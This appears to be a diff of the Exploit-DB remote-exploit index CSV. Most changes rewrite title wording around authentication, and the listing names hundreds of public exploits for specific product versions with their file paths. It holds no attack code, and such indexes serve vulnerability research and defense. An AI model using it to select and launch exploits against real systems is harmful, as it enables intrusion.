38849,exploits/cgi/remote/38849.rb,"Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)",2015-12-02,Metasploit,remote,cgi, 38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",remote,hardware, @@ -16064,7 +16064,7 @@ id,file,description,date,author,type,platform,port 39316,exploits/hardware/remote/39316.pl,"Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",remote,hardware, 39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",remote,multiple, 39328,exploits/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,remote,android,5555 -39437,exploits/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,remote,hardware, +39437,exploits/hardware/remote/39437.rb,"D-Link DCS-930L - (Authenticated) Remote Command Execution (Metasploit)",2016-02-10,Metasploit,remote,hardware, 39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp, 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux, 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80 @@ -16072,7 +16072,7 @@ id,file,description,date,author,type,platform,port 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware, 39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80 39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443 -39569,exploits/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,remote,multiple,22 +39569,exploits/multiple/remote/39569.py,"OpenSSH 7.2p1 - (Authenticated) xauth Command Injection",2016-03-16,tintinweb,remote,multiple,22 39585,exploits/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",remote,windows,80 39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,remote,hardware, 39599,exploits/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",remote,windows, @@ -16084,7 +16084,7 @@ id,file,description,date,author,type,platform,port 39645,exploits/multiple/remote/39645.php,"PHP 5.5.33/7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",remote,multiple, 39693,exploits/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,remote,unix, 39698,exploits/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",remote,windows, -39708,exploits/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,remote,multiple,80 +39708,exploits/multiple/remote/39708.rb,"Novell ServiceDesk - (Authenticated) Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,remote,multiple,80 39729,exploits/windows_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",remote,windows_x86,21 39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,remote,windows,80 39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",remote,linux, @@ -16107,7 +16107,7 @@ id,file,description,date,author,type,platform,port 39919,exploits/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,remote,multiple,8080 40441,exploits/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,remote,hardware, 39945,exploits/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,remote,linux,8080 -39958,exploits/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",remote,linux,443 +39958,exploits/linux/remote/39958.rb,"Bomgar Remote Support - Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",remote,linux,443 39973,exploits/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,remote,linux,443 39985,exploits/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",remote,windows,1604 39999,exploits/windows_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,remote,windows_x86-64,21 @@ -16128,11 +16128,11 @@ id,file,description,date,author,type,platform,port 40144,exploits/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution",2016-07-23,Raz0r,remote,php, 40146,exploits/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,remote,linux,8000 40147,exploits/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,remote,linux,8000 -40162,exploits/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,remote,linux,8000 +40162,exploits/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - (Authenticated) Remote Command Execution (Metasploit)",2016-07-26,xort,remote,linux,8000 40167,exploits/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access",2016-07-26,LiquidWorm,remote,linux,23 40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,remote,python,80 -40176,exploits/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,remote,linux,8000 -40177,exploits/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,remote,linux,8000 +40176,exploits/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - (Authenticated) Remote Command Execution (Metasploit) (3)",2016-07-29,xort,remote,linux,8000 +40177,exploits/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - (Authenticated) Remote Command Execution (Metasploit)",2016-07-29,xort,remote,linux,8000 40178,exploits/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,remote,windows,80 40200,exploits/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",remote,hardware, 40201,exploits/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",remote,linux, @@ -16163,7 +16163,7 @@ id,file,description,date,author,type,platform,port 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware, 43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091 43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware, -43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware, +43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware, 43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware, 43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php, 43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple, @@ -16197,13 +16197,13 @@ id,file,description,date,author,type,platform,port 40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows, 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547 40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows, 40778,exploits/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,remote,windows, -40805,exploits/multiple/remote/40805.rb,"D-Link DIR-Series Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,remote,multiple,80 +40805,exploits/multiple/remote/40805.rb,"D-Link DIR-Series Routers - HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,remote,multiple,80 40813,exploits/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",remote,hardware, 40824,exploits/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",remote,multiple,80 40830,exploits/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,remote,windows, @@ -16246,7 +16246,7 @@ id,file,description,date,author,type,platform,port 41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java, 41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows, 41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",remote,macos, -41471,exploits/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,remote,arm, +41471,exploits/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Command Execution (Metasploit)",2017-02-27,Metasploit,remote,arm, 41479,exploits/windows/remote/41479.py,"SysGauge 1.5.18 - Remote Buffer Overflow",2017-02-28,"Peter Baris",remote,windows, 41480,exploits/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",remote,hardware, 41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows, @@ -16285,10 +16285,10 @@ id,file,description,date,author,type,platform,port 43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple, 43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400 43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows, -43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810 -43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810 +43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman 'RestoreDBase' Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810 +43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810 43518,exploits/windows/remote/43518.rb,"LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit)",2018-01-11,Metasploit,remote,windows, -43519,exploits/php/remote/43519.rb,"phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit)",2018-01-11,Metasploit,remote,php, +43519,exploits/php/remote/43519.rb,"phpCollab 2.5.1 - File Upload (Metasploit)",2018-01-11,Metasploit,remote,php, 43523,exploits/windows/remote/43523.py,"ALLMediaServer 0.95 - Remote Buffer Overflow",2018-01-11,"Mario Kartone Ciccarelli",remote,windows, 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple, @@ -16339,11 +16339,11 @@ id,file,description,date,author,type,platform,port 42756,exploits/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",remote,java, 42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251 42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows, -42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001 +42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001 41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, -41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 +41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python, 41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows, 41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple, @@ -16357,7 +16357,7 @@ id,file,description,date,author,type,platform,port 41861,exploits/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,remote,linux, 41872,exploits/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",remote,hardware,23 42122,exploits/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",remote,hardware,23 -41892,exploits/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,remote,linux,8000 +41892,exploits/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Root Remote Code Execution",2017-04-18,agix,remote,linux,8000 41894,exploits/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",remote,windows, 41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,remote,hardware, 41903,exploits/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",remote,windows, @@ -16368,7 +16368,7 @@ id,file,description,date,author,type,platform,port 41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22 41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",remote,macos, 41975,exploits/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",remote,windows, -41978,exploits/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",remote,multiple, +41978,exploits/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Remote Code Execution",2017-05-09,"Silent Signal",remote,multiple, 41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80 41992,exploits/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)",2017-05-11,Metasploit,remote,windows, 41996,exploits/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",remote,php, @@ -16381,7 +16381,7 @@ id,file,description,date,author,type,platform,port 42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80 42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml, 42031,exploits/windows_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445 -42083,exploits/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, +42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, 42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux, 42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows, 42057,exploits/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,remote,windows, @@ -16393,7 +16393,7 @@ id,file,description,date,author,type,platform,port 42134,exploits/python/remote/42134.rb,"DC/OS Marathon UI - Docker (Metasploit)",2017-06-07,Metasploit,remote,python, 42152,exploits/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",remote,multiple, 42155,exploits/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Remote Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",remote,windows, -42158,exploits/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,remote,linux, +42158,exploits/linux/remote/42158.py,"Logpoint < 5.6.4 - Root Remote Code Execution",2017-06-11,agix,remote,linux, 42159,exploits/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",remote,windows, 42165,exploits/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow",2017-06-12,"Touhid M.Shaikh",remote,windows, 42175,exploits/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,remote,android, @@ -16420,7 +16420,7 @@ id,file,description,date,author,type,platform,port 42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64, 42355,exploits/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,remote,hardware, 42369,exploits/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,remote,cgi, -42370,exploits/unix/remote/42370.rb,"VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,remote,unix, +42370,exploits/unix/remote/42370.rb,"VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Command Execution (Metasploit)",2017-07-24,Metasploit,remote,unix, 42395,exploits/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Remote Buffer Overflow",2017-07-30,"Ahmad Mahfouz",remote,windows, 42484,exploits/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",remote,windows, 42541,exploits/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,remote,php, @@ -16472,7 +16472,7 @@ id,file,description,date,author,type,platform,port 42928,exploits/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow",2017-09-30,"Owais Mehtab",remote,windows, 42957,exploits/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",remote,linux, 42938,exploits/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,remote,linux, -42949,exploits/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,remote,linux, +42949,exploits/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution",2017-10-02,agix,remote,linux, 42952,exploits/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",remote,windows, 42958,exploits/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",remote,linux, 42964,exploits/linux_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,remote,linux_x86-64,8080 @@ -16485,7 +16485,7 @@ id,file,description,date,author,type,platform,port 43030,exploits/linux_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,remote,linux_x86,443 43031,exploits/linux_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,remote,linux_x86,1743 43032,exploits/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,remote,unix, -43055,exploits/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,remote,hardware, +43055,exploits/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Remote Code Execution (Metasploit)",2017-10-25,Metasploit,remote,hardware, 43059,exploits/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,remote,windows, 43061,exploits/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,remote,hardware, 43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware, @@ -16494,14 +16494,14 @@ id,file,description,date,author,type,platform,port 43121,exploits/windows/remote/43121.txt,"Avaya IP Office (IPO) < 10.1 - 'SoftConsole' Remote Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,remote,windows, 43125,exploits/windows_x86/remote/43125.html,"Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-10-17,mschenk,remote,windows_x86, 43132,exploits/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,remote,windows, -43142,exploits/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,remote,hardware,80 +43142,exploits/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Remote Code Execution",2017-03-08,PierreKimSec,remote,hardware,80 43141,exploits/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",remote,windows, -43143,exploits/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,remote,linux_mips, +43143,exploits/linux_mips/remote/43143.rb,"D-Link DIR-850L - OS Command Execution (Metasploit)",2017-11-14,Metasploit,remote,linux_mips, 43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,remote,windows,80 42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,remote,windows, 43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,remote,windows, 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows, -43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 +43193,exploits/unix/remote/43193.rb,"pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows, 43202,exploits/windows/remote/43202.py,"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)",2017-11-29,"Miguel Mendez Z",remote,windows, 43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80 @@ -16519,7 +16519,7 @@ id,file,description,date,author,type,platform,port 44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows, 44174,exploits/windows/remote/44174.rb,"Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,9124 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888 -44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999 +44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999 44187,exploits/windows/remote/44187.py,"GetGo 